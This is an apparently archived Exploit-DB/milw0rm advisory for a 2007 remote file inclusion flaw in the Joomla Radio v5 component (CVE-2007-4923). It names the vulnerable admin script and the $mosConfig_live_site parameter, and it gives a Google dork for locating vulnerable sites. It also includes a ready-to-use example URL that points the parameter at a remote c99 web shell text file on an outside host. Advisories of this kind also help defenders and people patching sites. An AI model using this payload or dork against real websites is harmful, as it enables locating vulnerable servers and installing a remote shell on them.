Joomla! Component Joomlaradio 5.0 - Remote File Inclusion
Author: Morgan
type: webapps
platform: php
port:
date_added: 2007-09-12
date_updated: 2016-10-12
verified: 1
codes: OSVDB-37028;CVE-2007-4923
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comjoomlaradiov5[unzip_first]_black.zip
###########################
# Joomla Radio v5 Component RFI #
###########################
Bug in :
administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php
Variable : $mosConfig_live_site
Download : http://www.joomlaos.de/option,com_remository/Itemid,41/func,fileinfo/id,2661.html
Dork: inurl:"com_joomlaradiov5"
Example:
www.site.com/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://scriptkiddie.com/c99haxor.txt?
Greets to all Irc.RealWorm.Net #Morgan Users ;)
# milw0rm.com [2007-09-13]